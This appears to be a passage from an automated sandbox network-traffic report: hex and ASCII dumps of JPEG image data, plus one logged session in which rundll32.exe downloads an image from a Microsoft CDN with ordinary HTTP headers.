                                                                                                                                                                                    2023-01-05 07:58:11 UTC8665INData Raw: af 75 d8 f6 e7 d9 be 7e 3f 27 e0 91 5a 62 27 c6 1e db a9 d4 d8 fe 96 07 d3 b1 f8 d7 1b 9d 5f 4d f4 3d 67 b3 66 59 b1 f5 e8 76 dc 07 9e 15 30 4a 37 aa e9 71 63 a7 f8 57 2e f6 4c ee 55 40 ce 76 3c 79 ea 62 65 1b cd f6 9b 7e af 51 f0 61 fc 6a 74 70 a5 11 b5 53 d1 99 ce 25 7f da f3 3f 65 9f 26 b3 02 b0 48 74 12 01 ff 00 d2 db d1 87 6b f5 ed 57 e6 7e a5 54 19 f1 53 d2 b4 36 5c 4c c2 36 31 11 b9 1c e8 08 ef e9 54 51 33 4e 46 82 3e e4 71 89 04 6e 51 75 b8 37 65 1f fe 32 fa f7 ab 15 e4 ae 20 68 e4 2c e1 8e 39 df 22 58 ed 1a 30 f9 03 d4 7f 6e bd 5f 57 a9 17 67 d8 61 32 9a 72 0c 4b fd 60 3e b4 3d c7 ae bd 47 c7 a8 ef 53 74 db af 54 57 5c 9b b4 ee 2f 2b 20 e2 5b f7 48 56 23 a6 ff 00 f4 1f 8f c3 e3 d3 d7 e1 5a 5b cb 9d b6 75 23 e3 4b 1e f3 04 f2 14 96 f7 8d b4 07 e5
                                                                                                                                                                                    Data Ascii: u~?'Zb'_M=gfYv0J7qcW.LU@v<ybe~QajtpS%?e&HtkW~TS6\L61TQ3NF>qnQu7e2 h,9"X0n_Wga2rK`>=GStTW\/+ [HV#Z[u#K
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8681INData Raw: 0e fe 9a 1d 45 59 24 6b a3 2b 71 84 9c 3b 18 4e e1 8b 31 0e 93 fe 9f d5 a5 9f d1 81 ef d0 d4 6f ae a4 aa a1 b4 5b 65 e2 7e f5 1e 29 80 77 23 63 23 1d 18 7c 3d 35 e9 e8 74 ff 00 4d 43 6f f7 22 75 b4 7d 36 32 9c 37 23 3f 8f cc fc 1e 58 2c aa a4 a6 e0 4b 6c ed f3 03 a7 ca df 0a ba ef 77 d4 8a a9 a3 da fe 46 82 6c fc 7e 71 02 e6 46 9e fc 8a 01 50 4f f5 63 b6 ac 3d 4a fc 7b 68 7a 52 4f 70 bf 2e 9d 8a 08 b9 95 e2 39 13 c3 f2 a2 d8 d3 15 6c 39 c7 70 07 63 ea 0f e3 6d 3d 28 b5 37 2d 07 5b ec 70 ce a2 86 39 57 da 36 64 75 d6 dd 0d c6 ba 7c 7b 55 35 7d 8b e3 b8 a8 a1 10 c6 52 53 74 5f d2 4f f0 fc 68 5a 05 b5 17 7d 9f d4 1a fa fc 45 58 f4 d4 ae ba 8e 80 09 be eb a9 d4 1f ed fc 6a 48 88 92 2c 7e 34 da 22 32 e2 f7 56 20 1a 00 8e 0e c7 0e dd aa 55 64 6c 82 94 28 3b d3
                                                                                                                                                                                    Data Ascii: EY$k+q;N1o[e~)w#c#|=5tMCo"u}627#?X,KlwFl~qFPOc=J{hzROp.9l9pcm=(7-[p9W6du|{U5}RSt_OhZ}EXjH,~4"2V Udl(;
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8685INData Raw: 4c 1c a2 91 7b 99 32 9b 1b 92 03 7b 68 a3 73 31 36 16 ef d0 e0 f6 ce 2b a3 dd 47 ab eb 6f 2e d0 5f 8f 1e d8 6b 57 de 0e 2d e4 5e 77 c5 f1 31 7e cf 2a 17 93 95 cc 7b 99 15 77 47 8d 0c 37 8d 11 54 18 c3 7b a5 77 1b 8d a1 0d c2 eb 6a f4 38 38 30 9a fe 19 37 96 d5 94 fa 47 40 f0 f9 8f f6 f9 e2 ff 00 e4 d8 70 bc f0 c2 65 89 33 27 76 72 37 6f b2 a4 64 08 d0 91 73 ee 0b b7 61 e8 5b 15 a9 5d b3 d4 aa dc 4d ea 6a fa ae c8 d3 78 7f 94 f9 14 39 52 79 6f 15 c2 b6 57 21 95 3e 42 67 4b 2c a8 b1 4b 11 8b 6a 40 a9 d5 0d 8f e9 1a 10 14 5b 4a c9 9e f8 e8 92 76 e9 1f c7 c0 59 55 29 4d 8b 46 4b f1 af 17 87 c4 38 89 7c 87 cf 57 23 08 b2 01 87 88 8c 8b 24 8f 73 b3 db 41 aa 28 be b2 93 71 da dd f0 f2 72 be 4d eb 4c 6f 49 d5 ff 00 89 46 3b 6e 70 94 99 1c 1f 2a e5 f2 f0 30 f1 7c
                                                                                                                                                                                    Data Ascii: L{2{hs16+Go._kW-^w1~*{wG7T{wj8807G@pe3'vr7odsa[]Mjx9RyoW!>BgK,Kj@[JvYU)MFK8|W#$sA(qrMLoIF;np*0|
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8701INData Raw: 25 76 b2 a9 70 3d 3f b7 f6 f8 51 10 13 24 49 21 d9 2f bd 1a 86 2b a3 2b 1d 7f b7 a1 a2 97 8d 18 5e b3 aa 3f ff d5 f0 a4 12 8c d6 c9 cc e1 bd b4 c9 69 3d d1 0a ef 31 48 0f f2 c4 1b 76 db 1e 80 8e 9a 5e be 5e e8 ac a6 cb fc 3e 30 72 6d f4 b9 65 14 9e 3b c8 73 72 64 4f 2e 21 5c 8c 94 dc cb 14 64 1f 71 1a d6 21 74 b9 d7 a8 15 65 f9 15 c7 54 d3 95 57 13 f1 23 85 b4 f5 33 5c 8f 87 67 e3 39 4e 0d 72 54 00 06 44 79 31 29 04 df a1 f6 cb 1b 5f d4 0a bf 0f 3e b6 53 92 3c 9d 5f f5 82 d4 f6 e8 c9 b8 f8 cb e1 12 5f 97 97 05 b2 89 57 38 d8 f0 99 a6 16 21 ac 5b f4 a0 3d 08 35 05 9d f3 13 f4 d5 a3 a6 eb 38 5f 2e ec 6a b2 52 e7 e5 66 f9 64 92 47 34 6b 12 cd 92 d9 84 47 1a a3 b0 6f a7 6a b2 01 65 00 fe 9e 83 af 5a d3 8d d7 8d af 5d 23 c8 be 95 5a 49 e8 cc 1c 7c ee 5f 94 c6
                                                                                                                                                                                    Data Ascii: %vp=?Q$I!/++^?i=1Hv^^>0rme;srdO.!\dq!teTW#3\g9NrTDy1)_>S<__W8![=58_.jRfdG4kGojeZ]#ZI|_
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8717INData Raw: b5 f9 df 9d ff 00 5a f3 f8 b8 bf 53 92 de a3 4b ea 49 bb 5a ab ca 7a a5 e0 8c 7c ea 5f 22 26 7d a1 ff 00 b5 8e 2b ee 77 96 73 df 7d 7c f7 90 38 13 bf 27 27 fb 4e 14 12 46 32 23 78 00 51 91 28 3b b6 35 d2 ea ae bd 6c 48 3d 2b da e3 f7 35 c7 e0 63 e2 2b a4 ab 58 b4 ff 00 73 7a ba af fc 54 c3 7d fb 14 df 95 6a d7 64 4b 8d 59 81 ff 00 b9 af b5 ff 00 71 ff 00 ed e6 0c bf b9 7e 03 e6 dc ce 4e 0c 59 10 49 97 0e 44 a6 39 20 32 30 f6 d8 c6 87 d9 92 32 48 53 64 5d b7 1f 4e d3 a5 9f b7 fd eb 89 cd e4 ff 00 c6 e7 c4 ab 64 b4 f0 b2 89 8f 14 e3 5d 7a 9a b0 3d f5 e9 f1 1f fb 25 ff 00 7b 78 be 67 14 3e 1d f7 26 65 e1 f9 49 1c 7f ef 31 c7 b7 8d 94 e7 41 bc 0d 23 73 a7 fc 9e 9b 7a 57 9e fd d7 ff 00 5e 67 e1 2b 64 e1 37 6c 7d 5e 39 8b 57 c5 a8 fc cb ef f8 90 cb 83 66 b5 30
                                                                                                                                                                                    Data Ascii: ZSKIZz|_"&}+ws}|8''NF2#xQ(;5lH=+5c+XszT}jdKYq~NYID9 202HSd]Nd]z=%{xg>&eI1A#szW^g+d7l}^9Wf0
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8721INData Raw: d5 cd fa a9 e8 72 ff 00 ba bc 87 90 e4 e6 a6 47 35 9b 8f 9d 23 46 61 89 f1 90 ac 51 46 a4 a9 86 3b 22 02 aa 6d 6e a2 fe ba d6 cf 6c a6 06 b6 d1 34 ab d6 7c 7c 49 f2 ad ea 25 67 df a1 9b ca e6 32 72 24 c6 cc f2 3c 37 93 8f 8e 12 b0 e2 c7 27 b6 ae ab fa 16 56 50 58 2e e1 b9 c6 8e c3 a6 db 86 ae 86 1e 16 2c 0d b5 d5 ea 0b 22 49 26 2b 97 62 66 1c ac d3 44 a9 9a 8a 25 8a 18 d1 63 fa 42 ff 00 4d 11 6c 11 12 d6 e9 7d 3a 93 56 f1 f9 17 c9 29 ae fa 15 de f2 f5 ec 61 b9 08 f0 62 9b da c6 b9 55 be e6 b1 b9 27 d6 fe 9d 2b 7e 3d dd c8 ca 68 ab 2a d8 92 89 b1 59 e3 65 37 56 bd 88 3e a2 d5 63 5b 94 30 4e 0f 43 fd 8b c0 e2 f9 5e 63 1a 0f 21 8d b2 30 f8 f8 b2 33 f3 64 91 b6 c5 16 36 3a 34 be de e3 d3 dd 93 e9 36 fa 9b 76 d1 d6 f5 cd e4 f1 ad 6b cf f6 f8 78 b3 4f 12 bf 56
                                                                                                                                                                                    Data Ascii: rG5#FaQF;"mnl4||I%g2r$<7'VPX.,"I&+bfD%cBMl}:V)abU'+~=h*Ye7V>c[0NC^c!03d6:46vkxOV
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8737INData Raw: e1 e3 b7 8e ea 6c ba 1f 3c e5 56 f4 c8 e9 0f 43 2f 9d c6 4e 33 97 81 39 67 96 8e 44 2d 0c c3 1d 83 46 54 fd 4a 55 81 03 69 f4 24 7a 91 5a f0 5e 9b 3d 46 9d 23 aa 9e a6 8f 42 23 73 83 b0 78 e7 db 29 33 b2 22 e2 bc cb 1c 14 30 86 c7 68 72 02 33 e9 a1 8b 79 d0 9f fe a6 e7 6d ff 00 43 0f d3 57 e3 be 1b d5 e4 c4 e6 4f 61 fb 7f f6 ee 1c ee 6e d5 93 e9 0f 53 6f e2 9e 01 8f 16 78 3e 1f 9d 36 36 5c 3f 4c f8 7c 94 25 5d 94 75 b2 b8 2a cb f1 00 8f 95 4e f4 aa 5a af 83 47 56 ff 00 b5 30 5a d1 89 ea 9f 4b 7f 23 b8 78 cf 8d e2 60 64 ca d2 f1 b8 d8 53 ea cc d8 e0 2a bf a9 0a 34 1f 86 9e bd 8d 51 69 7a 3d 4f 4f c2 e0 56 9a 5e 89 35 dd 1b 43 8f 0a 1d cb 28 b1 1d c5 d4 8f ed fd ba 8a 4e ac ed 2d 3a 8c cd 8a f8 96 9b 1b 50 7b 2e a3 f8 f5 16 a8 36 de 84 95 60 ff d1 f2 8f 39
                                                                                                                                                                                    Data Ascii: l<VC/N39gD-FTJUi$zZ^=F#B#sx)3"0hr3ymCWOanSox>66\?L|%]u*NZGV0ZK#x`dS*4Qiz=OOV^5C(N-:P{.6`9
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8753INData Raw: ba 3f 9a d6 3e 26 77 89 4c 33 67 e2 9f 7d f0 3c ce 17 8b 8b 69 f1 bc 81 46 c8 b1 a5 91 23 94 96 d3 74 53 3f d0 6d 7b d8 eb a7 43 5c 9e 4f ed 8c de d9 91 5d b9 a2 72 ed 59 d2 3f d5 55 af 96 85 76 ad e5 6b a4 98 bf 28 fb 0f c8 af 8a 2e 07 8c 4b 0b 66 e2 a9 9e 4c 41 ba f9 2d b5 8b 28 90 fd 23 ea 63 b1 02 85 d4 eb 7a eb 70 bf 7a e3 bf 27 fd d4 d5 6c e3 77 fa 56 91 2b c3 c5 f5 3d 23 f7 c4 f0 7e 9e 8a 25 cd 9f 89 c6 e2 f2 09 a2 f1 d1 f7 03 04 4f 98 dc 76 de 03 92 92 78 8c 6a b0 c9 8e 44 4e 77 eb 6b 8f 64 13 a8 f6 45 c0 dd 5e c3 95 c0 f5 2e b0 de 16 ef f7 29 0f 56 d5 bc 56 9d 25 fc fc 8e 73 ce de da 4f e5 37 7e 2f f7 35 fc bf ed cc fe 39 9c d2 98 20 9a 3e 2b 11 26 21 88 8a 76 39 32 aa ff 00 c8 ab 12 29 27 fd 60 74 b5 72 bd c3 db 1f 13 93 eb 55 eb 1b 9f 93 5f 4a
                                                                                                                                                                                    Data Ascii: ?>&wL3g}<iF#tS?m{C\O]rY?Uvk(.KfLA-(#czpz'lwV+=#~%OvxjDNwkdE^.)VV%sO7~/59 >+&!v92)'`trU_J
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8761INData Raw: b8 6e 27 c6 7e d9 f3 39 b1 f1 32 b6 62 71 18 b8 f0 46 af ef a2 c5 1c a2 56 94 03 74 dc 77 fd 22 e5 9c a3 1b 57 87 e4 f1 f1 72 33 65 cd 8a ae e9 d7 7d ac db d3 56 b6 a5 e3 db e4 67 e4 64 df 5d 16 88 e8 5c a7 92 f0 be 31 e1 e7 8a e1 a5 91 65 f6 b2 25 81 e4 53 fd 59 5a 53 0a c9 21 50 6e 0b 91 f5 0d 0e db 0f a4 55 58 d5 f3 dd 56 ca 12 6a 7e 4a 5a f9 54 e4 bc 4e f7 dc cf 25 fd c4 f2 dc cf 3b 8b 1b 8c c6 79 4e 12 8c 09 a6 c7 92 3d 1b 22 18 c4 32 38 3d 6c 59 80 20 d8 16 d7 43 5e a3 db 31 2e 2a 7a 29 d6 1a 7d 9e a8 e9 62 c9 5a 51 b6 a6 cd f5 f2 33 d9 bc 56 07 09 32 e2 f0 d8 2f 17 27 1c 92 40 c8 64 73 31 62 7d b6 0c c0 a8 8d d4 92 bb 42 db e2 41 ab d6 6b e4 7f 53 85 f0 d3 c7 e6 3e 43 6e e9 b5 d8 e4 1c 9f b7 91 34 3e ec cd 21 c6 c7 11 44 58 1d c8 a0 92 23 37 ec 01
                                                                                                                                                                                    Data Ascii: n'~92bqFVtw"Wr3e}Vgd]\1e%SYZS!PnUXVj~JZTN%;yN="28=lY C^1.*z)}bZQ3V2/'@ds1b}BAkS>Cn4>!DX#7
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8777INData Raw: 42 76 32 af 39 23 e2 72 59 ce 1e 68 0b 89 15 a1 96 db 0a b6 b7 0a 17 ea 22 c0 1f a4 74 af 51 ed 18 3f 4c eb 4c 6b 44 a3 77 87 cb c4 d5 eb be 45 63 48 83 07 0b e0 3f 14 d2 4e b8 b0 ae 34 48 ef 36 30 72 e6 57 be d4 7d c4 6e 7f e0 05 cd 75 72 e6 76 be c7 3a b7 1f 05 dc 8d b0 57 1e ad eb 1d 0d f6 2c 98 d9 5c 4e 1c 9c ea 87 19 31 ac 68 91 a9 1e de d0 4d 8e b6 17 b5 ef dc d7 98 c8 b2 3c ad 63 7f 95 f7 7d 4c 79 33 ee 7a 2d 4e 71 ce f8 46 1f 23 9e 39 1c 4c 82 98 5b d6 18 d2 fb 9a 46 51 b9 8c 61 ac 08 ec 45 fa d7 a3 e0 f3 af 87 1e db 6a fb c7 f3 25 8b 2e d5 e6 4d 87 83 c6 f3 01 8f ce c6 b9 31 f2 fc 9e 69 82 05 90 a4 66 48 e2 00 4a d0 d8 6d b8 fd 22 d6 54 e9 a9 e9 3c 99 df 1d ba d9 4d 52 96 d7 9f 89 ae 98 ad 96 dd 75 f0 23 f3 f8 12 e5 67 7e df 1e 08 b0 70 a3 5f 6e
                                                                                                                                                                                    Data Ascii: Bv29#rYh"tQ?LLkDwEcH?N4H60rW}nurv:W,\N1hM<c}Ly3z-NqF#9L[FQaEj%.M1ifHJm"T<MRu#g~p_n
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8793INData Raw: cb ad 23 56 72 ef 24 e4 db c9 33 a2 e3 d5 23 e1 b0 0b 04 66 11 97 65 2f a0 66 41 fa 41 e9 73 47 0b 8e b8 f5 76 b3 77 7d 63 a2 d3 b2 15 ed ea 74 43 5e 01 c4 70 be 31 cb 67 73 bc a4 9f be 8b 8f 44 48 f2 6f ba 3d ee 4e e2 17 4d 55 45 ec 2b ad c8 e7 5a d8 55 6a a2 d7 9f a7 c1 0a 98 26 d0 fa 12 f8 ff 00 bb d1 70 78 d3 f8 e4 e1 96 3e 42 29 f2 f0 a6 01 43 01 28 2b b1 43 5c 6e b8 b8 bf 7a e9 52 9e a5 55 9a d6 ad 56 cb b7 c4 d1 55 4a 5f 5e 86 5f 8c e4 f8 a6 e3 a5 f1 de 4f 22 4c d1 14 3f be 5c ac bb 63 ca 50 59 5e 32 18 90 cd d2 c5 48 bf 71 de a3 9b eb b2 b5 54 29 75 d3 58 f0 60 f1 56 ff 00 95 94 3c df 94 0e 3f 83 3e 31 f6 e2 77 8d b9 0c 80 32 92 2d 1e 41 b7 45 24 12 48 07 42 3f c2 9d 38 6b d5 f5 32 ea 92 d2 4a 68 da fa 59 c7 97 c2 a6 c7 32 23 cd ed ac 65 04 83 db
                                                                                                                                                                                    Data Ascii: #Vr$3#fe/fAAsGvw}ctC^p1gsDHo=NMUE+ZUj&px>B)C(+C\nzRUVUJ_^_O"L?\cPY^2HqT)uX`V<?>1w2-AE$HB?8k2JhY2#e
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8801INData Raw: 9f 8b cc 9b 17 7b 26 45 be 88 dc fd 12 21 fd 48 7d 08 3d 0f e2 2a dc ad 5d 49 9b 05 1e 37 06 c7 37 1b 1f c9 71 9f 89 8c 98 73 07 b8 b0 96 d0 ab 81 72 a7 d4 1e 8c 3f f5 0a cc 96 d6 69 b7 4d 0e 60 b9 52 71 68 bc 5f 3f 0b 43 0c 87 da 99 58 7f d2 97 a2 c8 a7 ba b7 7f 5f 9d 6f ad 95 fa 75 39 d0 e9 d7 a3 d1 f9 79 9a 19 71 3f de 70 e3 e3 66 6b 4d 03 15 8e 4e ba 77 07 d5 58 75 1f 8d 52 ec aa e4 d0 a8 ef 48 66 a2 24 1c 4b e3 63 6d 49 31 95 36 c9 1f 56 5b f7 53 dd 7b 10 7e 75 97 33 de e5 f5 ec 6d c1 47 44 92 e8 54 f2 32 47 0c 12 12 cd 2f 1a af b4 0f e7 8a fd 8f 7d 3a a9 a8 e3 4d 7c 49 5d a4 bc 86 30 e2 93 24 a8 c9 0b 2b 40 03 41 37 fa 91 b4 b1 fc 2a 57 6a af 42 38 96 ee bf 23 44 3d c9 2f 0b 80 33 61 04 40 e7 55 74 22 fb 6f de da 8b 1a ae 24 b2 76 bd 49 7c 03 17 89
                                                                                                                                                                                    Data Ascii: {&E!H}=*]I77qsr?iM`Rqh_?CX_ou9yq?pfkMNwXuRHf$KcmI16V[S{~u3mGDT2G/}:M|I]0$+@A7*WjB8#D=/3a@Ut"o$vI|
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8817INData Raw: f9 f5 c3 8e d4 e8 df f0 ce 93 e3 3c 7f 27 e0 9c 5e 6f 23 c8 49 0f fb bc 53 e3 c4 33 37 86 59 66 cc 0c 46 48 7b 6a 04 6a f2 ed 36 b0 5d 45 59 97 8e f3 b6 d6 94 50 92 e9 1e 47 9d e5 7f fd 4d ec de a9 7e 27 94 3c e3 cd b0 b9 0f d9 64 78 dc d2 c8 ab 0c eb 21 96 ce fa e4 49 b3 75 c7 ea 31 85 62 7d 4d 7a bf 6d f6 f7 86 af 77 57 1f 81 e8 7d a2 9e 8d 1c f7 72 8f 74 f9 3f 90 e0 f9 3c 7c 7e 44 e7 de f1 2c 1c 0f 6e 59 3e a2 f2 4c 71 a3 3d 7b ef 93 76 e2 41 b3 30 27 b5 7c 7f d9 7d ae fc 7b df 7c d7 25 af bb 4f 0d ce 2b f6 42 3a 3f b8 7d c5 56 95 c7 8d fd 5f 81 c0 3c db c9 20 fd b7 fb 57 11 85 ec 2e 6e 0a 4c 16 30 37 91 27 d4 eb bd 7f 9f 6d b4 f4 2d a6 e3 5e f3 85 87 d7 dd 6b bf c8 da 53 e5 dc e3 fe 92 f8 e8 b7 4b 6e b3 e4 bc 09 b1 62 f3 5c 97 92 fe de 17 8a 08 f9 3f
                                                                                                                                                                                    Data Ascii: <'^o#IS37YfFH{jj6]EYPGM~'<dx!Iu1b}MzmwW}rt?<|~D,nY>Lq={vA0'|}{|%O+B:?}V_< W.nL07'm-^kSKnb\?
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8833INData Raw: b8 60 c8 58 0d 74 2a 75 ef 5d 6e 27 32 9c 9a e8 d3 7f 1e 8c d0 d2 84 d7 7f 3e 9f 12 b7 8d fb 81 93 c6 32 e3 a9 75 49 2c 80 83 f5 2a df a9 3e 97 ed 5d 07 8e f0 e1 f4 44 dd 60 83 9f cb 4f c9 4d 1b f2 39 b2 b4 09 76 78 90 5c 93 73 a9 27 d3 d3 a5 2b 34 d6 95 d7 c5 94 aa aa 3e 9d 7b 9e a1 f0 ef 13 e2 fc eb 8c 83 8f e4 b8 b6 83 2b d9 66 19 33 33 a9 c9 01 4e d3 70 db 54 21 d7 66 cb d8 7c eb c5 7b a7 bc df 8b 6f a1 a7 ae bb 7a a6 45 fd 0f c5 1d 43 c1 3e de cb e0 dc 94 79 1e ee 2e 1c 6e 3d d9 62 80 c6 f3 b4 08 a0 c8 6e df 52 20 50 48 55 1f 59 d4 91 7a e7 f2 bd ca dc fa 77 97 a7 46 a1 f6 d1 77 f1 26 b2 cf 4e de 06 53 cb 73 f0 bc 83 f6 be 3e b8 87 13 95 93 1e 39 c0 45 59 63 95 b2 43 b7 b6 ed 26 ef ad 02 a9 3a fe 92 7b da ae e3 61 7c 6a bc ad ce ad 3e cd 2a f7 2b bb
                                                                                                                                                                                    Data Ascii: `Xt*u]n'2>2uI,*>]D`OM9vx\s'+4>{+f33NpT!f|{ozEC>y.n=bnR PHUYzwFw&NSs>9EYcC&:{a|j>*+
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8840INData Raw: 5a f7 3a 2f 13 f7 77 93 e1 b8 cc cc 98 32 f2 20 c3 17 6c 3c 48 cc 6c 43 3d 91 46 aa 59 7a 31 36 20 bd af 58 ad ec d5 c8 d5 5c 76 dc f5 d7 c4 b3 16 05 4a 6e 64 af fe 6e de 41 c1 47 cd f9 c6 04 5b 61 99 8c 12 92 e9 91 c9 4c 54 2a c4 54 91 74 43 ab 38 00 28 07 5b 90 0e 5b fb 6f a5 97 67 1e d1 29 4f 7a e3 aa ef 3f ea 7d 20 b7 3d d5 92 55 d0 a4 cb f2 0e 57 ca 27 c6 e1 b0 31 23 97 92 cd 59 24 38 b8 f1 2d e3 91 87 b6 af 66 05 56 ca 36 a2 8f a8 46 ab 66 52 ec 6b 66 3c 14 c2 9d 9b 8a ad 13 9e bd e3 cf cf b4 99 ef 81 51 49 73 c9 71 de 3b c6 71 bc 7c 78 29 9a fc a9 cf 7c 6c 99 8f fd 38 e2 84 11 b6 32 09 8d 8c 8e 75 7b b6 db 1b 0f 5c f8 f2 64 b3 b6 e8 84 a5 2e ee 7c 7e 0b b0 af 5f 4f 4d 0b 3e 1b cf a6 f1 5c 9c e8 14 b3 e4 63 34 50 09 a3 94 4d 1c 2d b0 a8 50 3e 90 4a
                                                                                                                                                                                    Data Ascii: Z:/w2 l<HlC=FYz16 X\vJndnAG[aLT*TtC8([[og)Oz?} =UW'1#Y$8-fV6FfRkf<QIsq;q|x)|l82u{\d.|~_OM>\c4PM-P>J


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    36192.168.2.44973680.67.82.211443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8856OUTGET /cms/api/am/imageFileData/RE4RyG4?ver=257c HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8857INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Last-Modified: Sun, 01 Jan 2023 10:50:52 GMT
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: 518f94c8-5d2f-4f8c-9397-f7c30dedcd6c
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE4RyG4?ver=257c
                                                                                                                                                                                    X-Source-Length: 1624057
                                                                                                                                                                                    Content-Length: 1624057
                                                                                                                                                                                    Cache-Control: public, max-age=96782
                                                                                                                                                                                    Expires: Fri, 06 Jan 2023 10:51:14 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:12 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8857INData Raw: ff d8 ff e1 14 4c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0e a6 00 00 00 27 10 00 0e a6 00 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 31 3a 31 36 20 31 36 3a 31 30 3a 31 30 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                    Data Ascii: LExifMM*bj(1r2i''Adobe Photoshop 21.1 (Windows)2022:01:16 16:10:108"
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8873INData Raw: 73 68 6f 70 3a 4c 61 79 65 72 4e 61 6d 65 3d 22 ee 85 9f ee 85 9f 20 20 20 20 20 4c 69 6b 65 20 77 68 61 74 20 79 6f 75 20 73 65 65 3f 22 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 61 79 65 72 54 65 78 74 3d 22 ee 85 9f ee 85 9f 20 20 20 20 20 4c 69 6b 65 20 77 68 61 74 20 79 6f 75 20 73 65 65 3f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 61 79 65 72 4e 61 6d 65 3d 22 2e 2e 2e 22 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 61 79 65 72 54 65 78 74 3d 22 2e 2e 2e 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 61 79 65 72 4e 61 6d 65 3d 22 50 61 73 74 72 79 20 41 72 74 20 61 6e 64 20 44 65 73 69 67 6e 20 41 72 74 20 49 6e 73 74 69 74 75 74 65 20 38 3a 30 30 20 50 4d 20 2d 20 31 30 3a 30 30 20 50 4d 22 20 70 68 6f 74 6f 73 68
                                                                                                                                                                                    Data Ascii: shop:LayerName=" Like what you see?" photoshop:LayerText=" Like what you see?"/> <rdf:li photoshop:LayerName="..." photoshop:LayerText="..."/> <rdf:li photoshop:LayerName="Pastry Art and Design Art Institute 8:00 PM - 10:00 PM" photosh
                                                                                                                                                                                    2023-01-05 07:58:12 UTC8889INData Raw: 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 33 39 31 31 31 39 32 35 36 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 31 3a 30 36 3a 30 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 38 30 38 31 33 34 38 39 34 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 31 3a
                                                                                                                                                                                    Data Ascii: sers\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_shutterstock_391119256_1080x1920.jpg saved&#xA;2016-07-26T11:06:09-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_GettyImages-4808134894_1080x1920.jpg saved&#xA;2016-07-26T11:
